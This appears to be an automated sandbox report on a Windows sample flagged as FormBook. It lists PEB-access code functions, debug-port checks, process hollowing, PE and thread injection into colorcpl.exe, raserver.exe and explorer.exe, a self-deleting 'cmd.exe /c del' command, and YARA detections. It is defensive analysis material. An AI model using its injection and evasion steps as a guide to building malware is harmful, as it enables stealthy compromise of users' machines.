          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]1_2_06E3A229
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A229 mov eax, dword ptr fs:[00000030h]1_2_06E3A229
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]1_2_06E3B236
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]1_2_06E3B236
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]1_2_06E3B236
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]1_2_06E3B236
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]1_2_06E3B236
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B236 mov eax, dword ptr fs:[00000030h]1_2_06E3B236
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E28A0A mov eax, dword ptr fs:[00000030h]1_2_06E28A0A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E15210 mov eax, dword ptr fs:[00000030h]1_2_06E15210
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E15210 mov ecx, dword ptr fs:[00000030h]1_2_06E15210
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E15210 mov eax, dword ptr fs:[00000030h]1_2_06E15210
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E15210 mov eax, dword ptr fs:[00000030h]1_2_06E15210
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1AA16 mov eax, dword ptr fs:[00000030h]1_2_06E1AA16
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1AA16 mov eax, dword ptr fs:[00000030h]1_2_06E1AA16
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDAA16 mov eax, dword ptr fs:[00000030h]1_2_06EDAA16
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EDAA16 mov eax, dword ptr fs:[00000030h]1_2_06EDAA16
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E33A1C mov eax, dword ptr fs:[00000030h]1_2_06E33A1C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]1_2_06E403E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]1_2_06E403E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]1_2_06E403E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]1_2_06E403E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]1_2_06E403E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E403E2 mov eax, dword ptr fs:[00000030h]1_2_06E403E2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3DBE9 mov eax, dword ptr fs:[00000030h]1_2_06E3DBE9
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC23E3 mov ecx, dword ptr fs:[00000030h]1_2_06EC23E3
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC23E3 mov ecx, dword ptr fs:[00000030h]1_2_06EC23E3
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EC23E3 mov eax, dword ptr fs:[00000030h]1_2_06EC23E3
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E953CA mov eax, dword ptr fs:[00000030h]1_2_06E953CA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E953CA mov eax, dword ptr fs:[00000030h]1_2_06E953CA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44BAD mov eax, dword ptr fs:[00000030h]1_2_06E44BAD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44BAD mov eax, dword ptr fs:[00000030h]1_2_06E44BAD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E44BAD mov eax, dword ptr fs:[00000030h]1_2_06E44BAD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE5BA5 mov eax, dword ptr fs:[00000030h]1_2_06EE5BA5
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED138A mov eax, dword ptr fs:[00000030h]1_2_06ED138A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ECD380 mov ecx, dword ptr fs:[00000030h]1_2_06ECD380
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E21B8F mov eax, dword ptr fs:[00000030h]1_2_06E21B8F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E21B8F mov eax, dword ptr fs:[00000030h]1_2_06E21B8F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4138B mov eax, dword ptr fs:[00000030h]1_2_06E4138B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4138B mov eax, dword ptr fs:[00000030h]1_2_06E4138B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4138B mov eax, dword ptr fs:[00000030h]1_2_06E4138B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42397 mov eax, dword ptr fs:[00000030h]1_2_06E42397
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4B390 mov eax, dword ptr fs:[00000030h]1_2_06E4B390
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1DB60 mov ecx, dword ptr fs:[00000030h]1_2_06E1DB60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E43B7A mov eax, dword ptr fs:[00000030h]1_2_06E43B7A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E43B7A mov eax, dword ptr fs:[00000030h]1_2_06E43B7A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1DB40 mov eax, dword ptr fs:[00000030h]1_2_06E1DB40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE8B58 mov eax, dword ptr fs:[00000030h]1_2_06EE8B58
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1F358 mov eax, dword ptr fs:[00000030h]1_2_06E1F358
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]1_2_06E3A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED131B mov eax, dword ptr fs:[00000030h]1_2_06ED131B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E140E1 mov eax, dword ptr fs:[00000030h]1_2_06E140E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E140E1 mov eax, dword ptr fs:[00000030h]1_2_06E140E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E140E1 mov eax, dword ptr fs:[00000030h]1_2_06E140E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B8E4 mov eax, dword ptr fs:[00000030h]1_2_06E3B8E4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B8E4 mov eax, dword ptr fs:[00000030h]1_2_06E3B8E4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E158EC mov eax, dword ptr fs:[00000030h]1_2_06E158EC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]1_2_06EAB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov ecx, dword ptr fs:[00000030h]1_2_06EAB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]1_2_06EAB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]1_2_06EAB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]1_2_06EAB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EAB8D0 mov eax, dword ptr fs:[00000030h]1_2_06EAB8D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]1_2_06E420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]1_2_06E420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]1_2_06E420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]1_2_06E420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]1_2_06E420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E420A0 mov eax, dword ptr fs:[00000030h]1_2_06E420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E590AF mov eax, dword ptr fs:[00000030h]1_2_06E590AF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4F0BF mov ecx, dword ptr fs:[00000030h]1_2_06E4F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4F0BF mov eax, dword ptr fs:[00000030h]1_2_06E4F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4F0BF mov eax, dword ptr fs:[00000030h]1_2_06E4F0BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19080 mov eax, dword ptr fs:[00000030h]1_2_06E19080
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E93884 mov eax, dword ptr fs:[00000030h]1_2_06E93884
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E93884 mov eax, dword ptr fs:[00000030h]1_2_06E93884
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE1074 mov eax, dword ptr fs:[00000030h]1_2_06EE1074
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED2073 mov eax, dword ptr fs:[00000030h]1_2_06ED2073
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E30050 mov eax, dword ptr fs:[00000030h]1_2_06E30050
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E30050 mov eax, dword ptr fs:[00000030h]1_2_06E30050
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2B02A mov eax, dword ptr fs:[00000030h]1_2_06E2B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2B02A mov eax, dword ptr fs:[00000030h]1_2_06E2B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2B02A mov eax, dword ptr fs:[00000030h]1_2_06E2B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E2B02A mov eax, dword ptr fs:[00000030h]1_2_06E2B02A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]1_2_06E4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]1_2_06E4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]1_2_06E4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]1_2_06E4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4002D mov eax, dword ptr fs:[00000030h]1_2_06E4002D
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A830 mov eax, dword ptr fs:[00000030h]1_2_06E3A830
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A830 mov eax, dword ptr fs:[00000030h]1_2_06E3A830
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A830 mov eax, dword ptr fs:[00000030h]1_2_06E3A830
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A830 mov eax, dword ptr fs:[00000030h]1_2_06E3A830
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE4015 mov eax, dword ptr fs:[00000030h]1_2_06EE4015
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EE4015 mov eax, dword ptr fs:[00000030h]1_2_06EE4015
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97016 mov eax, dword ptr fs:[00000030h]1_2_06E97016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97016 mov eax, dword ptr fs:[00000030h]1_2_06E97016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E97016 mov eax, dword ptr fs:[00000030h]1_2_06E97016
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B1E1 mov eax, dword ptr fs:[00000030h]1_2_06E1B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B1E1 mov eax, dword ptr fs:[00000030h]1_2_06E1B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B1E1 mov eax, dword ptr fs:[00000030h]1_2_06E1B1E1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06EA41E8 mov eax, dword ptr fs:[00000030h]1_2_06EA41E8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E461A0 mov eax, dword ptr fs:[00000030h]1_2_06E461A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E461A0 mov eax, dword ptr fs:[00000030h]1_2_06E461A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED49A4 mov eax, dword ptr fs:[00000030h]1_2_06ED49A4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED49A4 mov eax, dword ptr fs:[00000030h]1_2_06ED49A4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED49A4 mov eax, dword ptr fs:[00000030h]1_2_06ED49A4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED49A4 mov eax, dword ptr fs:[00000030h]1_2_06ED49A4
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E969A6 mov eax, dword ptr fs:[00000030h]1_2_06E969A6
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E951BE mov eax, dword ptr fs:[00000030h]1_2_06E951BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E951BE mov eax, dword ptr fs:[00000030h]1_2_06E951BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E951BE mov eax, dword ptr fs:[00000030h]1_2_06E951BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E951BE mov eax, dword ptr fs:[00000030h]1_2_06E951BE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov eax, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov eax, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov eax, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov eax, dword ptr fs:[00000030h]1_2_06E399BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3C182 mov eax, dword ptr fs:[00000030h]1_2_06E3C182
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4A185 mov eax, dword ptr fs:[00000030h]1_2_06E4A185
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42990 mov eax, dword ptr fs:[00000030h]1_2_06E42990
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1C962 mov eax, dword ptr fs:[00000030h]1_2_06E1C962
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B171 mov eax, dword ptr fs:[00000030h]1_2_06E1B171
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B171 mov eax, dword ptr fs:[00000030h]1_2_06E1B171
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B944 mov eax, dword ptr fs:[00000030h]1_2_06E3B944
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B944 mov eax, dword ptr fs:[00000030h]1_2_06E3B944
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov eax, dword ptr fs:[00000030h]1_2_06E34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov eax, dword ptr fs:[00000030h]1_2_06E34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov eax, dword ptr fs:[00000030h]1_2_06E34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov eax, dword ptr fs:[00000030h]1_2_06E34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov ecx, dword ptr fs:[00000030h]1_2_06E34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4513A mov eax, dword ptr fs:[00000030h]1_2_06E4513A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4513A mov eax, dword ptr fs:[00000030h]1_2_06E4513A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19100 mov eax, dword ptr fs:[00000030h]1_2_06E19100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19100 mov eax, dword ptr fs:[00000030h]1_2_06E19100
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19100 mov eax, dword ptr fs:[00000030h]1_2_06E19100
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E596E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_06E596E0

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\colorcpl.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 870000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 10410000Jump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 4A80000Jump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 4FA0000Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 10410000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 4A80000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 4FA0000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 10410000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\colorcpl.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 3324Jump to behavior
          Creates a thread in another existing process (thread injection)
          Source: C:\Users\user\Desktop\0321423605241625.exeThread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 4FA0000Jump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\colorcpl.exe"Jump to behavior
          Source: explorer.exe, 00000002.00000000.333633898.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.387636315.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.435849586.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.435849586.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.310463769.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.352140639.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000002.00000000.435849586.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.310463769.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.352140639.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.435849586.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.310463769.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.352140639.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.351540998.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.434029800.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.309952416.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02175D0C
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: GetLocaleInfoA,0_2_0217AA04
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: GetLocaleInfoA,0_2_0217A9B8
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02175E18
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02179438 GetLocalTime,0_2_02179438
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217B938 GetVersionExA,0_2_0217B938

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
